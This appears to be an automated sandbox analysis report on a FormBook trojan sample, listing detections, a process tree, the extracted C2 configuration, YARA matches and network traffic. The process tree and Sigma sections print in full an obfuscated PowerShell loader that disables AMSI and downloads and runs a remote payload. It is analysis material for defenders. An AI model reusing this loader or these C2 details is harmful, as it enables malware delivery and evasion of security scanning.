Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report s2rsXUiUn8

Overview

General Information

Sample Name:s2rsXUiUn8 (renamed file extension from none to exe)
Analysis ID:452684
MD5:f5041ec4ce468a07ecbfd076bc0f879b
SHA1:bda8cea1ec8d1cea253fc661559cd84cee2195b9
SHA256:caff14d450514a35eac5ba34b3e74126360662d7c8fdf60a8008a0e3bb8ed0b3
Tags:exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious PowerShell Command Line
Tries to detect virtualization through RDTSC time measurements
Very long command line found
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • s2rsXUiUn8.exe (PID: 4440 cmdline: 'C:\Users\user\Desktop\s2rsXUiUn8.exe' MD5: F5041EC4CE468A07ECBFD076BC0F879B)
    • conhost.exe (PID: 5436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5116 cmdline: Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,56,53,56,55,57,51,51,50,50,48,56,55,55,49,48,55,53,51,47,56,54,51,56,57,49,56,53,55,54,48,56,48,49,53,57,48,50,47,111,97,100,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($676544567888888888876545666778)|I`E`X MD5: 95000560239032BC68B4C2FDFCDEF913)
      • calc.exe (PID: 5856 cmdline: {path} MD5: 0975EE4BD09E87C94861F69E4AA44B7A)
        • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • help.exe (PID: 3552 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
            • cmd.exe (PID: 4344 cmdline: /c del 'C:\WINDOWS\syswow64\calc.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 3084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.homekeycap.com/pjje/"], "decoy": ["itsa-lifestyle.com", "searchclemson.com", "valenciabusiness.online", "valengz.com", "matematika-ege.online", "freetreeapp.com", "izzyworldpros.com", "qualityhealthsupply.com", "bedrockmappingllc.com", "sistersexlesbian.party", "numerologistreading.com", "bearcreekcattlebeef.com", "trophiesandtributes.com", "rajuherbalandspicegarden.com", "code-nana.com", "sofiepersson.com", "opticalsupples-kw.com", "strawberrylinebikehire.com", "29thplace.com", "oliviabegard.com", "hybridvenues.net", "huo-fo.com", "classicfirearmsny.com", "jlxrcm.com", "910portablestorage.com", "jewelryengravings.com", "loudsink.com", "collabasia.xyz", "northeastkitchenandbath.com", "bodrumdanakliyat.net", "raimirajkumararajah.com", "adultfeedrates.com", "compare-apr-rates.com", "ncdcnow.com", "huashi999.com", "swaplenders.com", "mission-duplex.com", "twenty-four-sevens.com", "growth-gmbh.com", "flying-agent.com", "luatsutruongquochoe.com", "thejewelcartel.com", "virtualbruins.com", "binhminhxanh.online", "wnz.xyz", "polishwithhart.com", "wecameforthis.com", "iti-gov.com", "a2zautoleasing.com", "akhisarozbirotohaliyikama.xyz", "tirupatipackersmovers.com", "virtualtheaterlive.com", "coronavirusfarmer.com", "crysdue.com", "cloolloy.com", "rowynetworks.com", "rakennuspalveluporola.net", "myparadisegetaways.com", "funnelsamurais.com", "thechiropractor.vegas", "04att.com", "copyrightforsupport.com", "hannrise.com", "softmov.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      9.2.calc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        9.2.calc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        9.2.calc.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x183f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1850c:$sqlite3step: 68 34 1C 7B E1
        • 0x18428:$sqlite3text: 68 38 2A 90 C5
        • 0x1854d:$sqlite3text: 68 38 2A 90 C5
        • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
        9.2.calc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          9.2.calc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Suspicious PowerShell Command LineShow sources
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community: Data: Command: Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,
          Sigma detected: Non Interactive PowerShellShow sources
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.homekeycap.com/pjje/"], "decoy": ["itsa-lifestyle.com", "searchclemson.com", "valenciabusiness.online", "valengz.com", "matematika-ege.online", "freetreeapp.com", "izzyworldpros.com", "qualityhealthsupply.com", "bedrockmappingllc.com", "sistersexlesbian.party", "numerologistreading.com", "bearcreekcattlebeef.com", "trophiesandtributes.com", "rajuherbalandspicegarden.com", "code-nana.com", "sofiepersson.com", "opticalsupples-kw.com", "strawberrylinebikehire.com", "29thplace.com", "oliviabegard.com", "hybridvenues.net", "huo-fo.com", "classicfirearmsny.com", "jlxrcm.com", "910portablestorage.com", "jewelryengravings.com", "loudsink.com", "collabasia.xyz", "northeastkitchenandbath.com", "bodrumdanakliyat.net", "raimirajkumararajah.com", "adultfeedrates.com", "compare-apr-rates.com", "ncdcnow.com", "huashi999.com", "swaplenders.com", "mission-duplex.com", "twenty-four-sevens.com", "growth-gmbh.com", "flying-agent.com", "luatsutruongquochoe.com", "thejewelcartel.com", "virtualbruins.com", "binhminhxanh.online", "wnz.xyz", "polishwithhart.com", "wecameforthis.com", "iti-gov.com", "a2zautoleasing.com", "akhisarozbirotohaliyikama.xyz", "tirupatipackersmovers.com", "virtualtheaterlive.com", "coronavirusfarmer.com", "crysdue.com", "cloolloy.com", "rowynetworks.com", "rakennuspalveluporola.net", "myparadisegetaways.com", "funnelsamurais.com", "thechiropractor.vegas", "04att.com", "copyrightforsupport.com", "hannrise.com", "softmov.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: s2rsXUiUn8.exeMetadefender: Detection: 17%Perma Link
          Source: s2rsXUiUn8.exeReversingLabs: Detection: 57%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 9.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, type: MEMORY
          Source: 9.2.calc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49711 version: TLS 1.2
          Source: Binary string: calc.pdbGCTL source: help.exe, 00000013.00000002.497718223.0000000002F8F000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.298383788.0000000007180000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: calc.exe, 00000009.00000002.342996454.000000000349F000.00000040.00000001.sdmp, help.exe, 00000013.00000002.497203365.0000000002B7F000.00000040.00000001.sdmp
          Source: Binary string: calc.pdb source: help.exe, 00000013.00000002.497718223.0000000002F8F000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: calc.exe, help.exe
          Source: Binary string: help.pdbGCTL source: calc.exe, 00000009.00000002.342338201.0000000002DD0000.00000040.00000001.sdmp
          Source: Binary string: help.pdb source: calc.exe, 00000009.00000002.342338201.0000000002DD0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.298383788.0000000007180000.00000002.00000001.sdmp
          Source: C:\Windows\SysWOW64\calc.exeCode function: 4x nop then pop ebx9_2_00407AFA
          Source: C:\Windows\SysWOW64\calc.exeCode function: 4x nop then pop edi9_2_0040E43F
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop ebx19_2_001A7AFB
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi19_2_001AE43F

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.homekeycap.com/pjje/
          Source: global trafficHTTP traffic detected: GET /pjje/?bxl0d=DltNRLknYIPOXZZpswXifEZmZKsLvkDXv3EaEi+D7UBg3hXwO76Ip4IkAw1khMTnG44t&r48tw=4hF0dRLhcH HTTP/1.1Host: www.rajuherbalandspicegarden.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 162.159.134.233 162.159.134.233
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /pjje/?bxl0d=DltNRLknYIPOXZZpswXifEZmZKsLvkDXv3EaEi+D7UBg3hXwO76Ip4IkAw1khMTnG44t&r48tw=4hF0dRLhcH HTTP/1.1Host: www.rajuherbalandspicegarden.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: google.com
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 0000000A.00000000.307113178.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
